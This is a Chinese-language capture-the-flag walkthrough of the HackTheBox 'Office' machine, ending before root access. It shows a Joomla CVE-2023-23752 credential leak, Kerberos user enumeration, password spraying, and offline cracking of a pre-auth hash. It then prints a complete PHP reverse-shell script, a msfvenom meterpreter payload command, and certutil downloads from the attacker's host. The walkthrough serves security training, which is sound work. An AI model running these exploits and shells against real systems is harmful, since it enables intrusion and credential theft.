端口扫描信息收集
使用nmap对靶机进行扫描
nmap -sC -sV 10.10.11.3
开放了80端口，并且注意到该ip对应的域名为office.htb，将其加入到hosts文件中后访问。注意到扫描出来的还有robots文件，经过尝试后只有administrator界面是可以访问的。访问后发现是一个Joomla的登录界面，使用默认用户名密码登录尝试后发现登录失败。接下来使用joomscan判断joomla的版本，查看是否存在已知漏洞。
joomscan --url http://10.10.11.3
joomla的版本为4.2.7，存在Joomla未授权访问漏洞(CVE-2023-23752)，利用方式为直接访问 /api/index.php/v1/config/application?public=true（注意参数是 public=true，原文丢失了等号）。这里利用该漏洞，红框处泄露了用户名密码 root/H0lOgrams4reTakIng0Ver754!。该接口在未登录的情况下直接返回站点配置（包括数据库账号密码），防御侧应升级到已修复该问题的Joomla版本，并排查web日志中对 /api/index.php/v1/config/ 的访问记录。
回想刚刚的端口扫描，靶机没有开放ssh端口，表示此处密码不能用于22端口；但是开放了445端口，或许这里是一个利用点。尝试后发现用户名密码不正确，猜测可能是用户名不正确，于是使用kerbrute对目标域进行用户名枚举。
./kerbrute userenum --dc 10.10.11.3 -d office.htb /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
拿到有效用户名后，用泄露的密码逐个尝试（即密码喷洒），发现用户dwolfe能够成功连接上。注意喷洒时每个账号只尝试这一个密码，避免触发域的账户锁定策略。
smbclient -L //10.10.11.3/ -U dwolfe%H0lOgrams4reTakIng0Ver754!
逐个查看共享文件夹里边的内容，在SOC Analysis文件夹中有一个pcap文件，使用mget将其下载到本地。
smbclient //10.10.11.3/SOC\ Analysis -U dwolfe%H0lOgrams4reTakIng0Ver754!
不管是tcp还是udp流都没有发现异常流量，但是发现了存在Kerberos流量。注意到在第二个数据包（AS-REQ）中有如下敏感数据：Kerberos预认证(pre-authentication)里的加密时间戳。此处可以使用hashcat对其进行离线破解，从而得到对应用户的密码。
首先能够注意到流量包中的加密类型(etype)为18，即AES-256。在 https://hashcat.net/wiki/doku.php?id=example_hashes 中我们能看到能够破解Kerberos预认证的模式为7500，但是7500模式对应的加密类型为23(RC4)，而并非18；继续查找发现19900模式同样能够破解Kerberos预认证，并且加密类型正好是18，但是19900模式（写作时）仅在beta版本中存在，下载链接为 https://hashcat.net/beta/
下载完成后输入以下命令
hashcat.exe -m 19900 $krb5pa$18$tstark$OFFICE.HTB$a16f4806da05760af63c566d566f071c5bb35d0a414459417613a9d67932a6735704d0832767af226aaa7360338a34746a00a3765386f5fc rockyou.txt
我们在密文之前传入的其他文本（$krb5pa$18$tstark$OFFICE.HTB）是hashcat要使用的参数列表，使用$符号分隔：前两个只是该哈希类型的hashcat格式的一部分，krb5pa表示Kerberos 5预身份验证(pre-auth)，18表示Kerberos加密类型18(AES-256)，tstark表示用户名（可以在流量包中的其他位置找到），OFFICE.HTB表示域名（同样可以在流量包中的其他位置找到），均在上图中标注出来了。注意：如果在Linux的bash下运行，需要用单引号把整个哈希括起来，否则$会被shell当作变量展开。破解出来的密码在原字符串的末尾，为playboy69。
回到joomla的登录界面，尝试使用tstark/playboy69登录，发现还是不能登录。将playboy69作为固定密码，使用burpsuite对用户名进行爆破，结果爆破出用户名为administrator -_-||（典型的密码复用）。进入界面后查找功能点，发现存在 system-site Templates，能够修改模板代码，直接将error.php的内容改为一段反弹shell的代码（注意：这会把原模板文件覆盖为webshell，测试结束后应恢复原文件）。
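<?php
// Copyright (c) 2020 Ivan Šincek
// v2.6
// Requires PHP v5.0.0 or greater.
// Works on Linux OS, macOS, and Windows OS.
// See the original script at https://github.com/pentestmonkey/php-reverse-shell.
//
// NOTE(review): this is post-exploitation tooling (a reverse shell). The listing on this
// page was garbled (quotes, '=', '<', '>', '&' and '@' were stripped), so it is restored
// here with its logic unchanged; only comments were added.

/**
 * Connects back to a listener and bridges the TCP socket with a local shell
 * (/bin/sh on Linux/macOS, cmd.exe on Windows) started via proc_open().
 */
class Shell {
    private $addr  = null;   // listener address, passed to fsockopen()
    private $port  = null;   // listener port, passed to fsockopen()
    private $os    = null;   // 'LINUX' or 'WINDOWS', set by detect()
    private $shell = null;   // '/bin/sh' or 'cmd.exe', set by detect()
    private $descriptorspec = array(
        0 => array('pipe', 'r'), // shell can read from STDIN
        1 => array('pipe', 'w'), // shell can write to STDOUT
        2 => array('pipe', 'w')  // shell can write to STDERR
    );
    private $buffer = 1024;  // read/write buffer size
    private $clen   = 0;     // command length (Windows only: bytes of the command echoed back on STDOUT)
    private $error  = false; // stream read/write error
    private $sdump  = true;  // script's dump: echo everything that passes through into the HTTP response

    /**
     * @param string $addr listener address
     * @param int    $port listener port
     */
    public function __construct($addr, $port) {
        $this->addr = $addr;
        $this->port = $port;
    }

    /**
     * Picks the OS family and shell binary from PHP_OS.
     * Returns false (after printing SYS_ERROR) on an unsupported OS.
     */
    private function detect() {
        $detected = true;
        $os = PHP_OS;
        if (stripos($os, 'LINUX') !== false || stripos($os, 'DARWIN') !== false) {
            $this->os    = 'LINUX';
            $this->shell = '/bin/sh';
        } else if (stripos($os, 'WINDOWS') !== false || stripos($os, 'WINNT') !== false || stripos($os, 'WIN32') !== false) {
            $this->os    = 'WINDOWS';
            $this->shell = 'cmd.exe';
        } else {
            $detected = false;
            echo "SYS_ERROR: Underlying operating system is not supported, script will now exit...\n";
        }
        return $detected;
    }

    /**
     * Best-effort fork into the background (needs the pcntl/posix extensions).
     * Returns true only in the parent after a successful fork, meaning the
     * caller should stop and leave the work to the child.
     */
    private function daemonize() {
        $exit = false;
        if (!function_exists('pcntl_fork')) {
            echo "DAEMONIZE: pcntl_fork() does not exists, moving on...\n";
        } else if (($pid = @pcntl_fork()) < 0) {
            echo "DAEMONIZE: Cannot fork off the parent process, moving on...\n";
        } else if ($pid > 0) {
            $exit = true;
            echo "DAEMONIZE: Child process forked off successfully, parent process will now exit...\n";
            // once daemonized, you will actually no longer see the script's dump
        } else if (posix_setsid() < 0) {
            echo "DAEMONIZE: Forked off the parent process but cannot set a new SID, moving on as an orphan...\n";
        } else {
            echo "DAEMONIZE: Completed successfully!\n";
        }
        return $exit;
    }

    /**
     * Runtime settings for a long-lived, quiet process. The '@' suppressions are
     * deliberate: these calls may be disabled by the host's php.ini.
     */
    private function settings() {
        @error_reporting(0);
        @set_time_limit(0); // do not impose the script execution time limit
        @umask(0);          // set the file/directory permissions - 666 for files and 777 for directories
                            // (anything the spawned shell creates becomes world-writable)
    }

    /**
     * Echoes $data into the HTTP response with '<' and '>' HTML-escaped,
     * so the dump stays readable inside the <pre> block printed by the caller.
     */
    private function dump($data) {
        if ($this->sdump) {
            $data = str_replace('<', '&lt;', $data);
            $data = str_replace('>', '&gt;', $data);
            echo $data;
        }
    }

    /**
     * fread() wrapper: on failure sets the global error flag (which ends the
     * main loop) and returns false.
     */
    private function read($stream, $name, $buffer) {
        if (($data = @fread($stream, $buffer)) === false) { // suppress an error when reading from a closed blocking stream
            $this->error = true;                            // set the global error flag
            echo "STRM_ERROR: Cannot read from {$name}, script will now exit...\n";
        }
        return $data;
    }

    /**
     * fwrite() wrapper: on failure sets the global error flag and returns false.
     */
    private function write($stream, $name, $data) {
        if (($bytes = @fwrite($stream, $data)) === false) { // suppress an error when writing to a closed blocking stream
            $this->error = true;                            // set the global error flag
            echo "STRM_ERROR: Cannot write to {$name}, script will now exit...\n";
        }
        return $bytes;
    }

    // read/write method for non-blocking streams
    // copies $input to $output until a read yields nothing or a write fails
    private function rw($input, $output, $iname, $oname) {
        while (($data = $this->read($input, $iname, $this->buffer)) && $this->write($output, $oname, $data)) {
            if ($this->os === 'WINDOWS' && $oname === 'STDIN') { $this->clen += strlen($data); } // calculate the command length
            $this->dump($data); // script's dump
        }
    }

    // read/write method for blocking streams (e.g. for STDOUT and STDERR on Windows OS)
    // we must read the exact byte length from a stream and not a single byte more
    private function brw($input, $output, $iname, $oname) {
        $size = fstat($input)['size'];
        if ($this->os === 'WINDOWS' && $iname === 'STDOUT' && $this->clen) {
            // for some reason Windows OS pipes STDIN into STDOUT
            // we do not like that
            // so we need to discard the data from the stream
            while ($this->clen > 0 && ($bytes = $this->clen >= $this->buffer ? $this->buffer : $this->clen) && $this->read($input, $iname, $bytes)) {
                $this->clen -= $bytes;
                $size -= $bytes;
            }
        }
        while ($size > 0 && ($bytes = $size >= $this->buffer ? $this->buffer : $size) && ($data = $this->read($input, $iname, $bytes)) && $this->write($output, $oname, $data)) {
            $size -= $bytes;
            $this->dump($data); // script's dump
        }
    }

    /**
     * Entry point: detect the OS, optionally daemonize, connect to the listener,
     * spawn the shell and pump data between the socket and the shell's pipes
     * until either side closes or a stream error occurs.
     */
    public function run() {
        if ($this->detect() && !$this->daemonize()) {
            $this->settings();

            // ----- SOCKET BEGIN -----
            $socket = @fsockopen($this->addr, $this->port, $errno, $errstr, 30);
            if (!$socket) {
                echo "SOC_ERROR: {$errno}: {$errstr}\n";
            } else {
                stream_set_blocking($socket, false); // set the socket stream to non-blocking mode | returns true on Windows OS

                // ----- SHELL BEGIN -----
                $process = @proc_open($this->shell, $this->descriptorspec, $pipes, null, null);
                if (!$process) {
                    echo "PROC_ERROR: Cannot start the shell\n";
                } else {
                    foreach ($pipes as $pipe) {
                        stream_set_blocking($pipe, false); // set the shell streams to non-blocking mode | returns false on Windows OS
                    }

                    // ----- WORK BEGIN -----
                    $status = proc_get_status($process);
                    @fwrite($socket, "SOCKET: Shell has connected! PID: {$status['pid']}\n");
                    do {
                        $status = proc_get_status($process);
                        if (feof($socket)) { // check for end-of-file on SOCKET
                            echo "SOC_ERROR: Shell connection has been terminated\n"; break;
                        } else if (feof($pipes[1]) || !$status['running']) {               // check for end-of-file on STDOUT or if process is still running
                            echo "PROC_ERROR: Shell process has been terminated\n"; break; // feof() does not work with blocking streams
                        }                                                                   // use proc_get_status() instead
                        $streams = array(
                            'read'   => array($socket, $pipes[1], $pipes[2]), // SOCKET | STDOUT | STDERR
                            'write'  => null,
                            'except' => null
                        );
                        $num_changed_streams = @stream_select($streams['read'], $streams['write'], $streams['except'], 0); // wait for stream changes | will not wait on Windows OS
                        if ($num_changed_streams === false) {
                            echo "STRM_ERROR: stream_select() failed\n"; break;
                        } else if ($num_changed_streams > 0) {
                            if ($this->os === 'LINUX') {
                                if (in_array($socket  , $streams['read'])) { $this->rw($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (in_array($pipes[2], $streams['read'])) { $this->rw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (in_array($pipes[1], $streams['read'])) { $this->rw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            } else if ($this->os === 'WINDOWS') {
                                // order is important
                                if (in_array($socket, $streams['read'])/*------*/) { $this->rw ($socket  , $pipes[0], 'SOCKET', 'STDIN' ); } // read from SOCKET and write to STDIN
                                if (($fstat = fstat($pipes[2])) && $fstat['size']) { $this->brw($pipes[2], $socket  , 'STDERR', 'SOCKET'); } // read from STDERR and write to SOCKET
                                if (($fstat = fstat($pipes[1])) && $fstat['size']) { $this->brw($pipes[1], $socket  , 'STDOUT', 'SOCKET'); } // read from STDOUT and write to SOCKET
                            }
                        }
                    } while (!$this->error);
                    // ------ WORK END ------

                    foreach ($pipes as $pipe) {
                        fclose($pipe);
                    }
                    proc_close($process);
                }
                // ------ SHELL END ------

                fclose($socket);
            }
            // ------ SOCKET END -----
        }
    }
}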
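// Wrap the dump in <pre> so the HTTP response stays readable; Shell::dump() escapes '<' and '>'.
echo '<pre>';
// change the host address and/or port number as necessary
// ('IP' / PORT are placeholders for the listener started on the attacking host)
$sh = new Shell('IP', PORT);
$sh->run();
unset($sh);
// garbage collector requires PHP v5.3.0 or greater
// @gc_collect_cycles();
echo '</pre>';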
?>
修改完成后保存，访问该界面（触发error.php），拿到shell。
权限提升
查看当前用户权限，发现还不是用户权限，先想办法提升到用户权限。查看靶机中有哪些用户，发现有之前爆破出密码的tstark用户，使用RunasCs进行提权。先使用msfvenom生成一个payload：
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[IP] LPORT=[PORT] -f exe -o payload.exe
将本地的RunasCs和payload上传到靶机
certutil.exe -urlcache -split -f http://10.10.14.2:8989/RunasCs.exe
certutil.exe -urlcache -split -f http://10.10.14.2:8989/payload.exe
使用RunasCs以tstark用户运行payload.exe，并且在msfconsole开启监听
RunasCs.exe tstark playboy69 payload.exe
成功拿到用户权限。注意：这样把明文密码直接写在命令行里，会被进程创建审计（如4688/Sysmon事件1）完整记录；certutil下载和未经处理的msfvenom载荷也很容易被杀软拦截，真实环境中需要考虑这些痕迹。
-------------------------------root权限待更新-------------------------------